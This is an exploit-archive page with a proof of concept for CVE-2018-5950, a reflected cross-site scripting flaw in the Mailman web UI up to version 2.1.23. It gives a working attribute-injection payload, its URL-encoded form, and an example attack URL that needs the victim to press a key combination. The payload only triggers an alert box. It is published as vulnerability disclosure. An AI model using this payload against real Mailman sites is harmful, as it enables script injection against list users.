what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mailman 2.1.23 Cross Site Scripting

Mailman 2.1.23 Cross Site Scripting
Posted Oct 29, 2020
Authored by Valerio Alessandroni

Mailman versions 1.x up through 2.1.23 suffer from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2018-5950
SHA-256 | 3acd354767ea65719c08384106b042f59668c91d3587059546459b8bc4c33aa3

Mailman 2.1.23 Cross Site Scripting

Change Mirror Download
# Title: Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)
# Type: Reflected XSS
# Software: Mailman
# Version: >=1.x <= 2.1.23
# Vendor Homepage: https://www.list.org
# Original link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5950
# POC Author: Valerio Alessandroni
# Date: 28/10/2020
# Description: Cross-site scripting (XSS) vulnerability in the web UI in Mailman before 2.1.26 allows remote attackers to inject arbitrary web script or HTML via a user-options URL.
#
# https://127.0.0.1/cgi-bin/mailman/options/[LIST]/[EMAIL][XSS]
# Which [LIST] is a valid list, [EMAIL] is a valid email and [XSS] is the payload
#
# For this POC I used the following payload
# CVE: CVE-2018-5950

"accesskey%3d"x"onclick%3d"alert`XSS`"

# Due the payload is loaded inside an HIDDEN INPUT TYPE, until today the only way to trigger the malicious code is via the accesskey attribute.
# An URL Encoded version of the payload is

%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22

# URL Example:

https://127.0.0.1/cgi-bin/mailman/options/list_name/test@test.com%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22

# In order to trigger the alert, the victim has to press the following buttons ALT+SHIFT+X
# where X is an arbitrary button inserted as accesskey attribute in the payload.
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close